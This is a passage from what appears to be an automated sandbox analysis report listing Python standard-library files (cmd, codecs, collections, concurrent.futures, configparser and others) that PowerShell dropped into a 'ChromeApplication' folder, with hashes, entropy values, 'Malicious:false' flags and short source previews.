                                                                                                                                                                                                  SSDEEP:192:PL0k/Lx0tTb7zgerjv/DrjydCD1azzAr3hBaUcWkfN7XBT5FMk:PL07tTbnge/zrjOcuAr3hTctfNN
                                                                                                                                                                                                  MD5:876EE912FD5D3663B4B6E9F2A46ACFFA
                                                                                                                                                                                                  SHA1:F097BE06A4249B38C56E2B7E309A2D1C7B5B3CB3
                                                                                                                                                                                                  SHA-256:2AE247591ED62FEE5E0DDF05D97EDECB3ACE71B752B1A3DF84CD5CD7FEA9B37F
                                                                                                                                                                                                  SHA-512:54AEB21E831EBEE41AA5C8F5099B9C2C605B45F74A9C45982DB6294ADDF799C7C3646101CCB2977F5DF2EB9D5C847C81D3CD49DA09E1E26A91A63B4E08592186
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""A generic class to build line-oriented command interpreters.....Interpreters constructed with this class obey the following conventions:....1. End of file on input is processed as the command 'EOF'...2. A command is parsed out of each line by collecting the prefix composed.. of characters in the identchars member...3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method.. is passed a single argument consisting of the remainder of the line...4. Typing an empty line repeats the last command. (Actually, it calls the.. method `emptyline', which may be overridden in a subclass.)..5. There is a predefined `help' method. Given an argument `topic', it.. calls the command `help_topic'. With no arguments, it lists all topics.. with defined help_ functions, broken into up to three topics; documented.. commands, miscellaneous help topics, and undocumented commands...6. The command '?' is a synonym for `help'. The command '!' is a synonym.. for `shell', if a do_

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\code.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10937
                                                                                                                                                                                                  Entropy (8bit):4.358655405051517
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BXaaxojmnJG2eGKSOwyTe4J54iLxqeKon:BXaanlt8eoCMbKo
                                                                                                                                                                                                  MD5:FEDBEE2BB47F5372D60AD7EAF7610714
                                                                                                                                                                                                  SHA1:E5B59A93FBF7E34F0EBEDFC240FF5930CA3FE18A
                                                                                                                                                                                                  SHA-256:1944F39B81A75344487E1B393B948B6EA76FF96E15DA5D2A5D5E94EC000E0885
                                                                                                                                                                                                  SHA-512:6CACB563B693C6C0C7335252FA8B7EBE90852F5D71942602B1DADEADEE45E991430120993901D3B4D0C5008540B67C6AD02F0F5039F9C26EE7F194BF872B6FD4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Utilities needed to emulate Python's interactive interpreter....."""....# Inspired by similar code by Jeff Epler and Fredrik Lundh.......import sys..import traceback..from codeop import CommandCompiler, compile_command....__all__ = ["InteractiveInterpreter", "InteractiveConsole", "interact",.. "compile_command"]....class InteractiveInterpreter:.. """Base class for InteractiveConsole..... This class deals with parsing and interpreter state (the user's.. namespace); it doesn't deal with input buffering or prompting or.. input file naming (the filename is always passed in explicitly)..... """.... def __init__(self, locals=None):.. """Constructor..... The optional 'locals' argument specifies the dictionary in.. which code will be executed; it defaults to a newly created.. dictionary with key "__name__" set to "__console__" and key.. "__doc__" set to None..... """.. if locals is None:.. locals = {"__n

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\codecs.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):37841
                                                                                                                                                                                                  Entropy (8bit):4.406059603619055
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:JsOEZ+8dxiEjo5gFcyjh8Rx+fo62JxMEtiyAmpqiWjI:JEfaxMEtiyAmpqiWjI
                                                                                                                                                                                                  MD5:8E0D20F2225EAD7947C73C0501010B0E
                                                                                                                                                                                                  SHA1:9012E38B8C51213B943E33B8A4228B6B9EFFC8BC
                                                                                                                                                                                                  SHA-256:4635485D9D964C57317126894ADACA91A027E017AEFD8021797B05415E43DBB4
                                                                                                                                                                                                  SHA-512:D95B672D4BE4CA904521C371DA4255D9491C9FC4D062EB6CF64EF0AB9CD4207C319BBD5CAABE7ADB2AAAA5342DEE74E3D67C9EA7D2FE55CB1B85DF11EE7E3CD3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:""" codecs -- Python Codec Registry, API and helpers.......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""....import builtins..import sys....### Registry and builtin stateless codec functions....try:.. from _codecs import *..except ImportError as why:.. raise SystemError('Failed to load the builtin codecs: %s' % why)....__all__ = ["register", "lookup", "open", "EncodedFile", "BOM", "BOM_BE",.. "BOM_LE", "BOM32_BE", "BOM32_LE", "BOM64_BE", "BOM64_LE",.. "BOM_UTF8", "BOM_UTF16", "BOM_UTF16_LE", "BOM_UTF16_BE",.. "BOM_UTF32", "BOM_UTF32_LE", "BOM_UTF32_BE",.. "CodecInfo", "Codec", "IncrementalEncoder", "IncrementalDecoder",.. "StreamReader", "StreamWriter",.. "StreamReaderWriter", "StreamRecoder",.. "getencoder", "getdecoder", "getincrementalencoder",.. "getincrementaldecoder", "getreader", "getwriter",.. "encode", "decode", "iter

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\codeop.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5762
                                                                                                                                                                                                  Entropy (8bit):4.666424353047493
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:CH1OT+d3PVt56zAg5x4Y0s2WbFr+NRa/y4DQD3vUCMPikrv59S4RzC4XovtrTfoo:sOOPfyASx49WbFrSRa/yCQD3Wit4RzCN
                                                                                                                                                                                                  MD5:650CB16239456DB3EE0EC431018677BE
                                                                                                                                                                                                  SHA1:1B77A1843EE49FC5A68D11FA83EA7D7A94934293
                                                                                                                                                                                                  SHA-256:EF7216362171A4400547499E84253ABF5D9D167490A06E668E5AD4C57FF2B9FB
                                                                                                                                                                                                  SHA-512:D7B9EC8FC9233BB149891CC5B4DB661A7EA9F5195451D4384B93895D71FE77B235A6353909574A53AA504D664EE50840C61B63AEE34AC1D92240F504D5C266CA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:r"""Utilities to compile possibly incomplete Python source code.....This module provides two interfaces, broadly similar to the builtin..function compile(), which take program text, a filename and a 'mode'..and:....- Return code object if the command is complete and valid..- Return None if the command is incomplete..- Raise SyntaxError, ValueError or OverflowError if the command is a.. syntax error (OverflowError and ValueError can be produced by.. malformed literals).....The two interfaces are:....compile_command(source, filename, symbol):.... Compiles a single command in the manner described above.....CommandCompiler():.... Instances of this class have __call__ methods identical in.. signature to compile_command; the difference is that if the.. instance compiles program text containing a __future__ statement,.. the instance 'remembers' and compiles all subsequent program texts.. with the statement in force.....The module also provides another class:....Compile():.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\collections\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):52954
                                                                                                                                                                                                  Entropy (8bit):4.506927099682533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:aCI4z5wctD9O9F2PxdKtDXo0a4vpHKaiJXbxpq6InhjQAo:XI4z5wctBOVUB
                                                                                                                                                                                                  MD5:4F8C270F0FFE58F5C0BF455403EF3F44
                                                                                                                                                                                                  SHA1:8C0DE07C711CD9486A3FF0D2FC8A5CD4C13AE01A
                                                                                                                                                                                                  SHA-256:2E5F3A5A7DE17BC2B2E749F0D2A1387DE2280A0824856360A041B2CA75E77194
                                                                                                                                                                                                  SHA-512:418971A91D03756A0B2790286F67135EE386AAA0817932130DDBA8B68DE601D5E29A3DCCEF1D965BAE22E66606C0A3132D179ABEC7E9296B715E1AAD1E6BDFAC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:'''This module implements specialized container datatypes providing..alternatives to Python's general purpose built-in containers, dict,..list, set, and tuple.....* namedtuple factory function for creating tuple subclasses with named fields..* deque list-like container with fast appends and pops on either end..* ChainMap dict-like class for creating a single view of multiple mappings..* Counter dict subclass for counting hashable objects..* OrderedDict dict subclass that remembers the order entries were added..* defaultdict dict subclass that calls a factory function to supply missing values..* UserDict wrapper around dictionary objects for easier dict subclassing..* UserList wrapper around list objects for easier list subclassing..* UserString wrapper around string objects for easier string subclassing....'''....__all__ = [.. 'ChainMap',.. 'Counter',.. 'OrderedDict',.. 'UserDict',.. 'UserList',.. 'UserString',.. 'defaultdict',.. 'd

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\collections\abc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):122
                                                                                                                                                                                                  Entropy (8bit):4.154562766131627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:16dgXGviibaIF6dgXGvisxCK46dgXGviYHEubWyn:14gX5TIF4gX5GS4gX5AE/y
                                                                                                                                                                                                  MD5:BEF5A0AF889CBE656D8F36952B66D86A
                                                                                                                                                                                                  SHA1:F58423BE30ACEC27E1B47617F47D2B6C94F01A72
                                                                                                                                                                                                  SHA-256:7AD86878712FC6682863F12208F4CED5DAF2DD82B6FF5ED58207DE29D0EFA410
                                                                                                                                                                                                  SHA-512:9DD60F99DA7FCAABE8CE08AB012CD507A98EE6E47DDA4A4E462CEB57DB16653B97B21D1DF1436DCCEDB1CD4B59433CECB697BCC3E031B52585F67C8454DB487D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:from _collections_abc import *..from _collections_abc import __all__..from _collections_abc import _CallableGenericAlias..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\colorsys.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4182
                                                                                                                                                                                                  Entropy (8bit):4.941140768387096
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:DuOeR5U4DSJVqfXZuNtrytho9oXDi6IX2:DuXPUyeyZk1yI9GDMX2
                                                                                                                                                                                                  MD5:155B90E667001B9A1FAE754CB38AFEE8
                                                                                                                                                                                                  SHA1:47C7E6928D08DC2FBF692D89B01E59DD8CA82183
                                                                                                                                                                                                  SHA-256:33885389962DA4BCD82B1286A184367116F6F407F61E18ECEFB09A1D8F17CF41
                                                                                                                                                                                                  SHA-512:0F7458FF53A6039B6F0DE62D7C3050BCF0F76E7B51C7BCE2E849E690B110299B561C5CA48FA5390F98D4148BA3FA6ACC48B1CAF8FAE4C063604005FBCDCD3704
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Conversion functions between RGB and other color systems.....This modules provides two functions for each color system ABC:.... rgb_to_abc(r, g, b) --> a, b, c.. abc_to_rgb(a, b, c) --> r, g, b....All inputs and outputs are triples of floats in the range [0.0...1.0]..(with the exception of I and Q, which covers a slightly larger range)...Inputs outside the valid range may cause exceptions or invalid outputs.....Supported color systems:..RGB: Red, Green, Blue components..YIQ: Luminance, Chrominance (used by composite video signals)..HLS: Hue, Luminance, Saturation..HSV: Hue, Saturation, Value.."""....# References:..# http://en.wikipedia.org/wiki/YIQ..# http://en.wikipedia.org/wiki/HLS_color_space..# http://en.wikipedia.org/wiki/HSV_color_space....__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",.. "rgb_to_hsv","hsv_to_rgb"]....# Some floating point constants....ONE_THIRD = 1.0/3.0..ONE_SIXTH = 1.0/6.0..TWO_THIRD = 2.0/3.0....# YIQ: used by composite video si

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\compileall.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20715
                                                                                                                                                                                                  Entropy (8bit):4.1633554259094465
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kFFpRRcNykbCAH86DekbUH1B61Oep2QiNFIboUUW6cUu:kF3RRcBVHpD3YH18RfEiboeX
                                                                                                                                                                                                  MD5:86772D3D944A28FBB5A6E79CA763ED41
                                                                                                                                                                                                  SHA1:CEAF743DEA6B5E115D6EB4A3369172EE3C572C1A
                                                                                                                                                                                                  SHA-256:2A2ADE75EA3DB61BC608962F40AF56F6BEAE3F16F87E8B81824E2D88F9964C2D
                                                                                                                                                                                                  SHA-512:1D8638DD0C44C98D56A3BCA8816C788ECE897FD7554917605BE7E5D9CBC9537EC5120AD678B9369A320E89F592614D1D6C3E1BCF4909BF583A0C748E0CD4FAC7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Module/script to byte-compile all .py files to .pyc files.....When called as a script with arguments, this compiles the directories..given as arguments recursively; the -l option prevents it from..recursing into directories.....Without arguments, if compiles all modules on sys.path, without..recursing into subdirectories. (Even though it should do so for..packages -- for now, you'll have to deal with packages separately.)....See module py_compile for details of the actual byte-compilation..."""..import os..import sys..import importlib.util..import py_compile..import struct..import filecmp....from functools import partial..from pathlib import Path....__all__ = ["compile_dir","compile_file","compile_path"]....def _walk_dir(dir, maxlevels, quiet=0):.. if quiet < 2 and isinstance(dir, os.PathLike):.. dir = os.fspath(dir).. if not quiet:.. print('Listing {!r}...'.format(dir)).. try:.. names = os.listdir(dir).. except OSError:.. if quiet < 2:..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\concurrent\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39
                                                                                                                                                                                                  Entropy (8bit):4.2336188853070205
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SbF8tHyxVWSov:SbFUHoVjov
                                                                                                                                                                                                  MD5:F8259102DFC36D919A899CDB8FDE48CE
                                                                                                                                                                                                  SHA1:4510C766809835DAB814C25C2223009EB33E633A
                                                                                                                                                                                                  SHA-256:52069AEEFB58DAD898781D8BDE183FFDA18FAAE11F17ACE8CE83368CAB863FB1
                                                                                                                                                                                                  SHA-512:A77C8A67C95D49E353F903E3BD394E343C0DFA633DCFFBFD7C1B34D5E1BDFB9A372ECE71360812E44C5C5BADFA0FC81387A6F65F96616D6307083C2B3BB0213F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This directory is a Python package...

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\concurrent\futures\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1607
                                                                                                                                                                                                  Entropy (8bit):4.235604960068566
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:QRFwLH5TbpZfLXA3TN9cf7Y961rTR0wMs8ShahNEmfh1GLdEk:kC5XjKK4QrTR05s8Sha7lfbGLv
                                                                                                                                                                                                  MD5:D5B3EA2EE977275CB75FA7254050B426
                                                                                                                                                                                                  SHA1:26446C7B142D2C5FC70F57A0A84EA25D281699CC
                                                                                                                                                                                                  SHA-256:954D4FFDEF55E3B4A273DF7CE43DCD4082DC07FFA0B7CC0BF7C5D7971D2A5103
                                                                                                                                                                                                  SHA-512:04B3C3E7195FF5099B17F0DD40F84EB1CB4ECF3D0D214EEB4ECFAE200CE3BE5BB5365B35909AF9FD71FF0A87EFDF30EA8FE891296B8372F795CCB0C518C558A4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Execute computations asynchronously using threads or processes."""....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....from concurrent.futures._base import (FIRST_COMPLETED,.. FIRST_EXCEPTION,.. ALL_COMPLETED,.. CancelledError,.. TimeoutError,.. InvalidStateError,.. BrokenExecutor,.. Future,.. Executor,.. wait,.. as_completed)....__all__ = (.. 'FIRST_COMPLETED',.. 'FIRST_EXCEPTION',.. 'ALL_COMPLETED',.. 'CancelledError',.. 'TimeoutError',.. 'BrokenExecutor',.. 'Future',.. 'Executor',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\concurrent\futures\_base.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23504
                                                                                                                                                                                                  Entropy (8bit):4.468628954944452
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:IFXDpqHFF4MIEh8F6OaoM0fSvPSmP049u35sBwwtJhkff5avYV:UX0vjI7FSCSSms49u35sBwwtJhkHJ
                                                                                                                                                                                                  MD5:93DB82D99C74121B1797F2063F319585
                                                                                                                                                                                                  SHA1:A0FC36E2E91766B7A99631E8D51B878F8EFA52FE
                                                                                                                                                                                                  SHA-256:F76ACCAF92680AC116460909422ABF26209FE57041B627B6C06752977CCEB109
                                                                                                                                                                                                  SHA-512:93481B3765891337D8B25DEAAAECA5B79747A7EDC7DFC21F223892028938D61FB75CE1393CB942DAED05AD884320678FA39C5A9A120C26E9244E30D1A50A2EEB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement.....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....import collections..import logging..import threading..import time..import types....FIRST_COMPLETED = 'FIRST_COMPLETED'..FIRST_EXCEPTION = 'FIRST_EXCEPTION'..ALL_COMPLETED = 'ALL_COMPLETED'.._AS_COMPLETED = '_AS_COMPLETED'....# Possible future states (for internal use by the futures package)...PENDING = 'PENDING'..RUNNING = 'RUNNING'..# The future was cancelled by the user.....CANCELLED = 'CANCELLED'..# ...and _Waiter.add_cancelled() was called by a worker...CANCELLED_AND_NOTIFIED = 'CANCELLED_AND_NOTIFIED'..FINISHED = 'FINISHED'...._FUTURE_STATES = [.. PENDING,.. RUNNING,.. CANCELLED,.. CANCELLED_AND_NOTIFIED,.. FINISHED..]...._STATE_TO_DESCRIPTION_MAP = {.. PENDING: "pending",.. RUNNING: "running",.. CANCELLED: "cancelled",.. CANCELLED_AND_NOTIFIED: "cancelled",.. FINISHED: "finished"..}....# Logger

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\concurrent\futures\process.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32786
                                                                                                                                                                                                  Entropy (8bit):4.435552445856024
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:NfMKj9sLbd2C7ZC2lDMQ8giCi/cEziF5BGONrHGhBUM:NkKj9gbd7di/pGrfmh
                                                                                                                                                                                                  MD5:8BE1FA85BDB6A2F722E1655E1901D9A5
                                                                                                                                                                                                  SHA1:D192DAE1349A0FEFF76F2F38251D29564426B704
                                                                                                                                                                                                  SHA-256:8DFCAA4EA1AB7350CB85FFA3DD6E43D99A951FF50A76EA1DBD32842D7AE277A0
                                                                                                                                                                                                  SHA-512:E737E322559AACFF016C5994CF466E2B40FDC2B35875301CBD6A25D9FF9C98D4421DC8EB7BC1EC08DF5092ACC06E40F3335699A4F0A81E7D8288695727B59BDC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Implements ProcessPoolExecutor.....The following diagram and text describe the data-flow through the system:....|======================= In-process =====================|== Out-of-process ==|....+----------+ +----------+ +--------+ +-----------+ +---------+..| | => | Work Ids | | | | Call Q | | Process |..| | +----------+ | | +-----------+ | Pool |..| | | ... | | | | ... | +---------+..| | | 6 | => | | => | 5, call() | => | |..| | | 7 | | | | ... | | |..| Process | | ... | | Local | +-----------+ | Process |..| Pool | +----------+ | Worker | | #1..n |..| Executor | | Thread |

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\concurrent\futures\thread.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9007
                                                                                                                                                                                                  Entropy (8bit):4.337359259102267
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:NVFRR//hda27aGTSqu/UDLWdLNEWjvb/DHjbbpU+izS9ek3/8N1x:NVFRNHDLWdLNvvb/npQ8a
                                                                                                                                                                                                  MD5:2896FAE3BBC3EDA99EB9A2715924F3BB
                                                                                                                                                                                                  SHA1:C81D93475ECB0C8702D2CB3B57F8ABFE3CFE402C
                                                                                                                                                                                                  SHA-256:F53E2BED48B9828D273F7B7A16ACBA0D21005F5FDD9E3054536275538A70E719
                                                                                                                                                                                                  SHA-512:A1110CADC406B02E8FB88C98F03D1132476612AF7E8C93D0E6BB413826AEECBC764358A5FA91227A5136BBBE6F7D323095F4C55D16F2723AFAD737524DA13FAD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:# Copyright 2009 Brian Quinlan. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Implements ThreadPoolExecutor."""....__author__ = 'Brian Quinlan (brian@sweetapp.com)'....from concurrent.futures import _base..import itertools..import queue..import threading..import types..import weakref..import os......_threads_queues = weakref.WeakKeyDictionary().._shutdown = False..# Lock that ensures that new workers are not created while the interpreter is..# shutting down. Must be held while mutating _threads_queues and _shutdown..._global_shutdown_lock = threading.Lock()....def _python_exit():.. global _shutdown.. with _global_shutdown_lock:.. _shutdown = True.. items = list(_threads_queues.items()).. for t, q in items:.. q.put(None).. for t, q in items:.. t.join()....# Register for `_python_exit()` to be called just before joining all..# non-daemon threads. This is used instead of `atexit.register()` for..# compatibility with subint

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\configparser.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55980
                                                                                                                                                                                                  Entropy (8bit):4.368047563053184
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:eBBEAmz8YtgZh2NpD3V7uDkG02ep14pYp4RGOHU32hzkjg2p:eBBEAmz8YtgusFzkjJp
                                                                                                                                                                                                  MD5:E2E049217E2DEF4D361FEC0E2C25B507
                                                                                                                                                                                                  SHA1:5F959A6B69F00A1AF8EB9822F79D6D66F0EA05D7
                                                                                                                                                                                                  SHA-256:F03B42D5031A340528293A9F8F61F65A2F05E0DED3B4CD2E8AE6C81995ED38E5
                                                                                                                                                                                                  SHA-512:C6150D588760EC17A7EA4B8401ABB2DB6AD1357E0FC78DCCD8152C135776070BA686C1F66596D515289FF1C6CDDB586E9CEC7423EE92650D72E26C00AD1BB96A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Configuration file parser.....A configuration file consists of sections, lead by a "[section]" header,..and followed by "name: value" entries, with continuations and such in..the style of RFC 822.....Intrinsic defaults can be specified by passing them into the..ConfigParser constructor as a dictionary.....class:....ConfigParser -- responsible for parsing a list of.. configuration files, and managing the parsed database..... methods:.... __init__(defaults=None, dict_type=_default_dict, allow_no_value=False,.. delimiters=('=', ':'), comment_prefixes=('#', ';'),.. inline_comment_prefixes=None, strict=True,.. empty_lines_in_values=True, default_section='DEFAULT',.. interpolation=<unset>, converters=<unset>):.... Create the parser. When `defaults` is given, it is initialized into the.. dictionary or intrinsic defaults. The keys must be strings, the values.. must be appropriate for %()s string in

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\contextlib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26627
                                                                                                                                                                                                  Entropy (8bit):4.372794794720749
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:krzxlsXr260wtYBNcBOzUZfpqWzrz4ONszCAthtv6aDrxzCI:kHxlCYBNcB6cpq8QOgi8D
                                                                                                                                                                                                  MD5:F26C810F186A8C2F158EEE1090238DDB
                                                                                                                                                                                                  SHA1:280B4ABED6C0BFDEF651011ECD21E89F91E6E2A6
                                                                                                                                                                                                  SHA-256:ACD2A8C3F86CE069FB43CDE542BA8A8BD17FD9FB27EF5FCF38210D599A7F344F
                                                                                                                                                                                                  SHA-512:354F476256213149604F8D79D68AEF37D757FC6A1D3B8FAEB8CA8F77E96F139E2DFBED8AA2FAEBEFDCCB646BAE86254BEEAABD440FE0D3DDABC8207161E4167D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Utilities for with-statement contexts. See PEP 343."""..import abc..import sys..import _collections_abc..from collections import deque..from functools import wraps..from types import MethodType, GenericAlias....__all__ = ["asynccontextmanager", "contextmanager", "closing", "nullcontext",.. "AbstractContextManager", "AbstractAsyncContextManager",.. "AsyncExitStack", "ContextDecorator", "ExitStack",.. "redirect_stdout", "redirect_stderr", "suppress", "aclosing"]......class AbstractContextManager(abc.ABC):.... """An abstract base class for context managers.""".... __class_getitem__ = classmethod(GenericAlias).... def __enter__(self):.. """Return `self` upon entering the runtime context.""".. return self.... @abc.abstractmethod.. def __exit__(self, exc_type, exc_value, traceback):.. """Raise any exception triggered within the runtime context.""".. return None.... @classmethod.. def __subclasshook__(cls, C):.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\contextvars.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):133
                                                                                                                                                                                                  Entropy (8bit):4.404091567342511
                                                                                                                                                                                                  Encrypted:false
